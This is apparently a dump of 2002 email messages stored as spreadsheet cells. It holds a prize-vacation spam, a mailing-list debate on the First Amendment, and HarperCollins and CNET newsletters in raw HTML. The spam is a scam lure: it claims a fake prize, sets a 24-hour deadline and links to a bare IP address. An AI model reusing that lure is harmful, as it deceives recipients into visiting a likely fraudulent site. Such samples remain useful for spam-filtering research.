     &lt;b&gt; &lt;font color="#000066"&gt;AIRFARE INCLUDED&lt;/font&gt;&lt;/b&gt; &lt;font color="#FF0033"&gt;for 
     two&lt;/font&gt;&lt;/font&gt;&lt;/li&gt;
   &lt;li&gt;&lt;font face="Courier New, Courier, mono" size="4" color="#000099"&gt;Rental 
     car with &lt;b&gt;&lt;font color="#FF0033"&gt;UNLIMITED MILEAGE&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/li&gt;
   &lt;li&gt;&lt;font face="Courier New, Courier, mono" size="4" color="#FF0033"&gt;2 day pass 
     to&lt;/font&gt;&lt;font face="Courier New, Courier, mono" size="4" color="#000099"&gt; 
     &lt;b&gt;UNIVERSAL STUDIOS&lt;/b&gt;&lt;/font&gt;&lt;/li&gt;
   &lt;li&gt;&lt;font face="Courier New, Courier, mono" size="4" color="#000099"&gt;&lt;b&gt;&lt;font color="#FF0033"&gt;$500&lt;/font&gt;&lt;/b&gt; 
     coupon book for meals and entertainment&lt;/font&gt;&lt;/li&gt;
   &lt;li&gt;&lt;font face="Courier New, Courier, mono" size="4" color="#FF0033"&gt;&lt;b&gt;2 CASINO 
     CRUISE tickets&lt;/b&gt;&lt;/font&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p align="left"&gt;&lt;font face="Courier New, Courier, mono" size="4"&gt;To claim your 
   prize just visit our website &lt;a href="http://202.108.221.18/www143/"&gt;Click here&lt;/a&gt;&lt;br&gt;
 &lt;/font&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;font face="Courier New, Courier, mono" size="4"&gt;Thanks for entering 
   our contest and we look forward to seeing you soon. &lt;/font&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;font face="Courier New, Courier, mono" size="4"&gt;Sincerely, &lt;/font&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;font face="Courier New, Courier, mono" size="4"&gt;Jacqueline O'Connor&lt;br&gt;
   Director of Promotoins&lt;/font&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;font face="Courier New, Courier, mono" size="4"&gt;P.S. You&amp;#146;ve 
   got to hurry. If you don&amp;#146;t claim your vacation in the next 24 hours&lt;br&gt;
   it may be gone. Availability is limited. So don&amp;#146;t wait,
 &lt;a href="http://202.108.221.18/www143/"&gt;Click 
   here&lt;/a&gt; today. &lt;/font&gt;&lt;font face="Courier New, Courier, mono"&gt;&lt;br&gt;
   &lt;br&gt;
   &lt;br&gt;
   &lt;/font&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;font face="Courier New, Courier, mono"&gt;&lt;br&gt;
   &lt;br&gt;
   To be excluded from future promotions &lt;a href="http://202.108.221.18/www143/remove.htm"&gt;Click here&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re[4]: A moment of silence for the First Amendment (fwd)
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Mr.,
 Monday, September 30, 2002, 1:19:12 PM, you wrote:
 MF&gt; ----- Original Message -----
 MF&gt; From: &lt;bitbitch@magnesium.net&gt;
 &gt;&gt; People are screaming and shouting over the political figures because
 &gt;&gt; they cannot be heard in any other way.
 MF&gt; What, are they illiterate? Mute? What's their problem? If somebody stops
 MF&gt; them from posting web pages, or printing newsletters, or talking on the
 MF&gt; phone, or organizing their /own/ conference then that would be wrong.
 Perhaps /cannot be heard in any other way (period)/ was incorrect.
 What I meant, was a time-specific occurence.  Sure, there are other
 means outside of the circumstance of the occurence. BUt until we're
 willing to eliminate the ability to speak in public -only- for the
 side that doesn't agree with the political force, and make that part
 of the 1st amendment, the parties -are- screaming and shouting over
 political figures because they cannot be heard (to those figures) in
 any other way.
 MF&gt; I don't think free speech is a license to speak directly at and be in the
 MF&gt; physical presence of any particular individual of your choosing - especially
 MF&gt; when that individual is busy doing something else and isn't interested.
 Sure.  And that goes back to my second argument -- Cohen.   THey can
 walk away.   NObody compells them to stand there, I'll agree fully.
 But we still have a Constitutional right to speak out against
 policies, actions and grievances.
 Again.  If you want it another way, lets change the Constitution.
 -- 
 Best regards,
  bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Terry Pratchett - AuthorTracker News from HarperCollins
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_0358_01C247F9.FBE93A30
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 &lt;http://www.harpercollins.com/hc/scripts/clicks.asp?sid=12535&amp;id=7848_8_
 20_2002&amp;url=http://www.harpercollins.com/hc&gt; 	
 Hello!
 Your selected author, Terry Pratchett
 &lt;http://www.harpercollins.com/hc/scripts/clicks.asp?sid=12535&amp;id=7848_8_
 20_2002&amp;url=http://www.harpercollins.com/rd/authortracker/author/7848&gt; ,
 has new work(s) on sale today!
 ON SALE TODAY	
 	  	The Last Hero: A Discworld Fable (Paperback)
 &lt;http://www.harpercollins.com/hc/scripts/clicks.asp?sid=12535&amp;id=7848_8_
 20_2002&amp;url=http://www.harpercollins.com/rd/authortracker/book/006050777
 2&gt; 
 &lt;http://www.harpercollins.com/hc/scripts/clicks.asp?sid=12535&amp;id=7848_8_
 20_2002&amp;url=http://www.harpercollins.com/rd/authortracker/book/006050777
 2&gt;
 &lt;http://www.harpercollins.com/hc/scripts/clicks.asp?sid=12535&amp;id=7848_8_
 20_2002&amp;url=http://www.harpercollins.com/rd/authortracker/excerpt/006050
 7772&gt;
 &lt;http://www.harpercollins.com/hc/scripts/clicks.asp?sid=12535&amp;id=7848_8_
 20_2002&amp;url=http://www.harpercollins.com/rd/authortracker/order/00605077
 72&gt; 
 Click here for more information about our authors and services.
 &lt;http://www.harpercollins.com/hc/scripts/clicks.asp?sid=12535&amp;id=7848_8_
 20_2002&amp;url=http://www.harpercollins.com/rd2/authortracker/authors/&gt; 
 Click here to learn more about our newsletter program.
 &lt;http://www.harpercollins.com/hc/scripts/clicks.asp?sid=12535&amp;id=7848_8_
 20_2002&amp;url=http://www.harpercollins.com/rd2/authortracker/newsletters/&gt;
 Best regards,
 HarperCollins Publishers
 ::::::::::::::::::::::::::::::	
 You have received this message because you are subscribed to the
 harpercollins.com
 &lt;http://www.harpercollins.com/hc/scripts/clicks.asp?sid=12535&amp;id=7848_8_
 20_2002&amp;url=http://www.harpercollins.com/rd2/authortracker/home/&gt;
 Author Tracker system. 
 You are currently receiving this message in HTML format. If you would
 like to switch to text-only format click here
 &lt;http://www.harpercollins.com/services/authorupdate/edit.asp?email=0fdce
 dyyai001@sneakemail.com&amp;sid=12535&gt; . 
 If you wish to unsubscribe click here
 &lt;http://www.harpercollins.com/services/authorupdate/unsubscribe.asp?sid=
 12535&amp;email=0fdcedyyai001@sneakemail.com&gt; . 
 If you wish to review our privacy policy click here
 &lt;http://www.harpercollins.com/hc/scripts/clicks.asp?sid=12535&amp;id=7848_8_
 20_2002&amp;url=http://www.harpercollins.com/hc/privacy/index.asp&gt; .
 ::::::::::::::::::::::::::::::	
 ------=_NextPart_000_0358_01C247F9.FBE93A30
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;HTML&gt;&lt;BODY vLink=3Dblue link=3Dblue =
 background=3D""http://www.harpercollins.com/services/authorupdate/images/=
 hcpemailheaderback.gif" marginheight=3D"0" marginwidth=3D"10" =
 topmargin=3D"0" leftmargin=3D"10"&gt;&lt;table border=3D0 bgcolor=3Dsilver =
 width=3D100%&gt;&lt;tr&gt;&lt;td bgcolor=3Dblack&gt;&lt;a =
 href=3D"http://www.harpercollins.com/hc/scripts/clicks.asp?sid=3D12535&amp;id=
 =3D7848_8_20_2002&amp;url=3Dhttp://www.harpercollins.com/hc"&gt;&lt;IMG =
 src=3D"http://www.harpercollins.com/services/authorupdate/images/hcpemail=
 header.gif" border=3D0 NOSEND=3D"1"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;br&gt;&lt;FONT =
 FACE=3Darial SIZE=3D2&gt;Hello!&lt;BR&gt;&lt;BR&gt;Your selected author, &lt;A =
 HREF=3D"http://www.harpercollins.com/hc/scripts/clicks.asp?sid=3D12535&amp;id=
 =3D7848_8_20_2002&amp;url=3Dhttp://www.harpercollins.com/rd/authortracker/aut=
 hor/7848"&gt;Terry Pratchett&lt;/A&gt;, has new work(s) on sale =
 today!&lt;BR&gt;&lt;BR&gt;&lt;table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" =
 bgcolor=3D"#FFFFFF" width=3D"300"&gt;&lt;tr&gt;&lt;td width=3D"8" height=3D"8" =
 bgcolor=3D"silver"&gt;&lt;img border=3D"0" =
 src=3D"http://www.harpercollins.com/services/authorupdate/images/ul.gif" =
 width=3D"8" height=3D"8"&gt;&lt;/td&gt;&lt;td height=3D"8"&gt;&lt;img border=3D"0" =
 src=3D"http://www.harpercollins.com/services/authorupdate/images/ul.gif" =
 width=3D"1" height=3D"1"&gt;&lt;/td&gt;&lt;td height=3D"8"&gt;&lt;img border=3D"0" =
 src=3D"http://www.harpercollins.com/services/authorupdate/images/ul.gif" =
 width=3D"1" height=3D"1"&gt;&lt;/td&gt;&lt;td width=3D"8" height=3D"8" =
 bgcolor=3D"silver"&gt;&lt;img border=3D"0" =
 src=3D"http://www.harpercollins.com/services/authorupdate/images/ur.gif" =
 width=3D"8" height=3D"8"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3D4 =
 align=3Dcenter&gt;&lt;FONT FACE=3Darial SIZE=3D2&gt;&lt;strong&gt;ON SALE =
 TODAY&lt;/strong&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width=3D"8"&gt;&lt;img border=3D"0" =
 src=3D"ul.gif" width=3D"1" height=3D"1"&gt;&lt;/td&gt; &lt;td&gt;&lt;img =
 src=3D"http://www.harpercollins.com/coverimages/small/0060507772.jpg"&gt;&lt;/t=
 d&gt;&lt;td&gt;&lt;FONT FACE=3Darial SIZE=3D2&gt;&lt;A =
 HREF=3D"http://www.harpercollins.com/hc/scripts/clicks.asp?sid=3D12535&amp;id=
 =3D7848_8_20_2002&amp;url=3Dhttp://www.harpercollins.com/rd/authortracker/boo=
 k/0060507772"&gt;&lt;B&gt;The Last Hero: A Discworld Fable =
 (Paperback)&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;A =
 HREF=3D"http://www.harpercollins.com/hc/scripts/clicks.asp?sid=3D12535&amp;id=
 =3D7848_8_20_2002&amp;url=3Dhttp://www.harpercollins.com/rd/authortracker/boo=
 k/0060507772"&gt;&lt;IMG =
 SRC=3Dhttp://www.harpercollins.com/catalog/images/icons/about.gif =
 BORDER=3D0&gt;&lt;/A&gt;&lt;A =
 HREF=3D"http://www.harpercollins.com/hc/scripts/clicks.asp?sid=3D12535&amp;id=
 =3D7848_8_20_2002&amp;url=3Dhttp://www.harpercollins.com/rd/authortracker/exc=
 erpt/0060507772"&gt;&lt;IMG =
 SRC=3Dhttp://www.harpercollins.com/catalog/images/icons/excerpt.gif =
 BORDER=3D0&gt;&lt;/A&gt;&lt;A =
 HREF=3D"http://www.harpercollins.com/hc/scripts/clicks.asp?sid=3D12535&amp;id=
 =3D7848_8_20_2002&amp;url=3Dhttp://www.harpercollins.com/rd/authortracker/ord=
 er/0060507772"&gt;&lt;IMG =
 SRC=3Dhttp://www.harpercollins.com/catalog/images/icons/buy.gif =
 BORDER=3D0&gt;&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/td&gt;&lt;td width=3D"8"&gt;&lt;img border=3D"0" =
 src=3D"ul.gif" width=3D"1" height=3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3D4 =
 height=3D2&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width=3D""8"" height=3D"8" =
 bgcolor=3D"silver"&gt;&lt;img border=3D"0" =
 src=3D"http://www.harpercollins.com/services/authorupdate/images/ll.gif" =
 width=3D"8" height=3D"8"&gt;&lt;/td&gt;&lt;td height=3D"8"&gt;&lt;img border=3D"0" =
 src=3D"http://www.harpercollins.com/services/authorupdate/images/ul.gif" =
 width=3D"1" height=3D"1"&gt;&lt;/td&gt;&lt;td height=3D"8"&gt;&lt;img border=3D"0" =
 src=3D"http://www.harpercollins.com/services/authorupdate/images/ul.gif" =
 width=3D"1" height=3D"1"&gt;&lt;/td&gt;&lt;td width=3D"8" height=3D"8" =
 bgcolor=3D"silver"&gt;&lt;img border=3D"0" =
 src=3D"http://www.harpercollins.com/services/authorupdate/images/lr.gif" =
 width=3D"8" height=3D"8"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;BR&gt;&lt;A =
 HREF=3D"http://www.harpercollins.com/hc/scripts/clicks.asp?sid=3D12535&amp;id=
 =3D7848_8_20_2002&amp;url=3Dhttp://www.harpercollins.com/rd2/authortracker/au=
 thors/"&gt;Click here for more information about our authors and =
 services.&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;&lt;A =
 HREF=3D"http://www.harpercollins.com/hc/scripts/clicks.asp?sid=3D12535&amp;id=
 =3D7848_8_20_2002&amp;url=3Dhttp://www.harpercollins.com/rd2/authortracker/ne=
 wsletters/"&gt;Click here to learn more about our newsletter =
 program.&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;Best regards,&lt;BR&gt;&lt;BR&gt;HarperCollins =
 Publishers&lt;BR&gt;&lt;BR&gt;&lt;TABLE WIDTH=3D360&gt;&lt;TR&gt;&lt;TD&gt;&lt;FONT FACE=3Darial =
 SIZE=3D2&gt;::::::::::::::::::::::::::::::&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;&lt;FONT =
 FACE=3Darial SIZE=3D2&gt;You have received this message because you are =
 subscribed to the &lt;A =
 HREF=3D"http://www.harpercollins.com/hc/scripts/clicks.asp?sid=3D12535&amp;id=
 =3D7848_8_20_2002&amp;url=3Dhttp://www.harpercollins.com/rd2/authortracker/ho=
 me/"&gt;harpercollins.com&lt;/A&gt; Author Tracker system.  &lt;BR&gt;You are currently =
 receiving this message in HTML format.  If you would like to switch to =
 text-only format &lt;A =
 HREF=3Dhttp://www.harpercollins.com/services/authorupdate/edit.asp?email=3D=
 0fdcedyyai001@sneakemail.com&amp;sid=3D12535&gt;click here&lt;/A&gt;.  &lt;BR&gt;If you =
 wish to unsubscribe &lt;A =
 HREF=3Dhttp://www.harpercollins.com/services/authorupdate/unsubscribe.asp=
 ?sid=3D12535&amp;email=3D0fdcedyyai001@sneakemail.com&gt;click here&lt;/A&gt;.  =
 &lt;BR&gt;If you wish to review our privacy policy &lt;A =
 HREF=3D"http://www.harpercollins.com/hc/scripts/clicks.asp?sid=3D12535&amp;id=
 =3D7848_8_20_2002&amp;url=3Dhttp://www.harpercollins.com/hc/privacy/index.asp=
 "&gt;click =
 here&lt;/A&gt;.&lt;BR&gt;::::::::::::::::::::::::::::::&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/FON=
 T&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;IMG =
 SRC=3D"http://www.harpercollins.com/hc/scripts/openrate.asp?emailid=3D784=
 8_8_20_2002" height=3D"0"&gt;&lt;/IMG&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ------=_NextPart_000_0358_01C247F9.FBE93A30--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CNET NEWS.COM: Selling secure laptops no open-shut case
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
         &lt;title&gt;Selling secure laptops no open-shut case&lt;/title&gt;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&lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=60-oqItIsE3hTVXnYGLN8S_eSgFWVRR" target="new"&gt;   
 &lt;img src="http://ad.doubleclick.net/ad/N1090.cnet/B926801.16;sz=160x600;ord=[timestamp]?" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;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href="http://clickthru.online.com/Click?q=75-whwtIKU3zF828oK_rjups7LLZ5ZR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=8a-3y3dQXnM4BjvJjoO3Nt-tKChBwnR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=9f-o7XMQ1JMEHnT86DYlcGhVIlcU_eR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b4-aJlbQ6Z2HGlHfx8qJzDxDXozLCyR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c9-3OZLQpgDZBks4fSjg0SxiPZvH6lR"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18, 2002&lt;/font&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;img src="http://home.cnet.com/b.gif" alt="" width="1" height="6" border="0"&gt;&lt;br&gt;
 	&lt;font face="Arial, Helvetica" size="-1"&gt;
 	 &lt;a href="#h1" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Selling secure laptops no open-shut case&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h2" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Apple's harvest: New iPods, bigger iMac and more&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h3" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Microsoft unbundles directory technology&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h4" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Pittman set to leave AOL Time Warner&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h5" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Tech activists protest anti-copying&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h6" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Earnings alert: Handspring trims loss&lt;/font&gt;&lt;/a&gt;&lt;br&gt;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Helvetica"&gt;&amp;nbsp;&lt;b&gt;Perspectives&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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&lt;b&gt;The options party is over&lt;/b&gt;&lt;br&gt;
 Kenneth Broad says it's easy to see why the tech industry is fighting to keep options from being expensed.&lt;br&gt;
 				&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=df-1kJhQLETx2aGE9BfbQq-Kh1XhaeR" &gt;Read Full Story&lt;/a&gt;&lt;/b&gt;&lt;br&gt;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&lt;b&gt;Selling secure laptops no open-shut case&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Rop Gonggrijp admits that it's not a promising time to start an Internet privacy company.
 The founder of NAH6 knows all about flops such as Privada, abandoned software such as PGP and SafeWeb, and struggling firms such as Zero Knowledge.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 18, 2002, 4:00 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f4-Y-XEQ0sDS-WAlK1uUJ5QddfWmTyR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;P&gt;
 &lt;a name="h2"&gt;&lt;b&gt;Apple's harvest: New iPods, bigger iMac and more&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 As the Mac faithful gather in New York, Apple CEO Steve Jobs rallies to the defense of the Mac OS X operating system and trots out new hardware, including a bigger iMac and iPods for Windows. But the company heads into murky waters with its .Mac Web services plan.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 18, 2002, 10:50 a.m. PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=09-joDSIj8jskisYs-LYSS7ZMgtY8lR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h3"&gt;&lt;b&gt;Microsoft unbundles directory technology&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Microsoft will begin selling its directory technology as a standalone product separate from the Windows operating system.
 Microsoft will continue to build in its "Active Directory" as part of Windows, but will give its customers the new option of buying the technology as a separate product next year, Microsoft executives said this week. The directory technology essentially provides a network manager with a central database to store and manage information about users, computer systems and networking devices. Microsoft competes against Novell and Sun Microsystems in the directory-server software market.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 18, 2002, 11:30 AM PT&lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1e-JQuLI4jPx93qRtRqEsB8LE27qd4R" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;br&gt;
 &lt;a name="h4"&gt;&lt;b&gt;Pittman set to leave AOL Time Warner&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 AOL Time Warner is expected to announce after the stock markets close Thursday that embattled chief operating officer Robert Pittman will relinquish his role as the media behemoth's No. 2 executive, according to a source close to the company.
 Pittman, who also serves as the interim chief exective of the company's America Online unit, could remain at the online division until a permanent CEO is found. But the timetable for Pittman's departure will be based on his own decision, the source added. AOL Time Warner last week confirmed that it hired executive search firm Spencer Stuart to head AOL's CEO search.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 18, 2002, 12:05 PM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=33-vUjnINjcJozsgUkz6yClxb-7XsrR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h5"&gt;&lt;b&gt;Tech activists protest anti-copying&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Enthusiasts of free software disrupted a Commerce Department meeting Wednesday, insisting on their right to debate the entertainment industry over anti-copying technologies.
 About a dozen vocal tech activists in the audience challenged speakers, including Jack Valenti, head of the Motion Picture Association of America (MPAA), who equated piracy with theft and applauded digital rights management.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 17, 2002, 5:55 PM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=48-ggFbIdBwVsXND3UXl_kj2ZBSJuRR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h6"&gt;&lt;b&gt;Earnings alert: Handspring trims loss&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Read the latest in earnings reports and financial news from some of technology's leading players. This page is updated as new reports are filed. Keep checking back for the latest.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 18, 2002, 11:00 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=5e-ssGdIn0i96ZzzeyhsnStcVTQzc9R"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&lt;b&gt;The view from Expedia's pilot&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 CEO Richard Barton on the online travel company's big plans for corporate-travel services--and on Barry Diller's takeover bid.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 18, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=73-__ZeIBB9P59tvijT8UEE0WNrUZcR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;b&gt;WorldCom feels the freeze&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 A quick reorganization and turnaround are looking ever less likely now that a New York judge has put $2.5 billion of its assets on ice.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 18, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=88-ec5PQQKHi5Kf4Ux-rU358atSBbiR"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href="http://clickthru.online.com/Click?q=9d-kkCWQv0hotlIednuKLvd75wKZzPR"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href="http://clickthru.online.com/Click?q=b2-M4pwQX04AFwfM5YjM2cmpxUCPunR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/pg/021502_pointcamera.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c7-KG43QLPPHrusZi8NWtUoF24wxeeR"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href="http://clickthru.online.com/Click?q=dc-40zzQ0LQvqwl8TvBz6gEwTinhlyR" &gt;5-megapixel shoot-out&lt;/a&gt;&lt;br /&gt;
 &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=f1-MtTuQpsTLuBpoIQH3XX8owMnerlR"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href="http://clickthru.online.com/Click?q=06-fP6uI481hKWl36omap_vCgSyiL4R" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 2. &lt;a href="http://clickthru.online.com/Click?q=1c-cs_iIFraA8jagP3n9kgGa2oXqGyR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 3. &lt;a href="http://clickthru.online.com/Click?q=31-V_YRIjMwkaSz7aZyLxjkqVAXXblR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 4. &lt;a href="http://clickthru.online.com/Click?q=46-19zwInpkGH5i8s6a1cN0535V0Y9R" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 5. &lt;a href="http://clickthru.online.com/Click?q=5b-5LOwIBKkZhc3YmqxCjjvDSwizzcR" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=70-3vnJIdpiybsfOjzKns2asfI8UkRR"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src="http://news.cnet.com/i/ne/bb/2002/07/0717_jobs3a.jpg" alt="" width="96" height="72" border="0"&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;img src="http://home.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;
                         &lt;b&gt;&lt;font size="+0"&gt;&lt;a href="http://clickthru.online.com/Click?q=86-8fH1QCJm04zVBRgSjaeTldfVpf4R" &gt;New iPod does Windows&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 At Macworld in New York, Apple Computer CEO Steve Jobs shows off a new iPod that's thinner, cheaper -- and compatible with Microsoft Windows. &lt;br&gt;
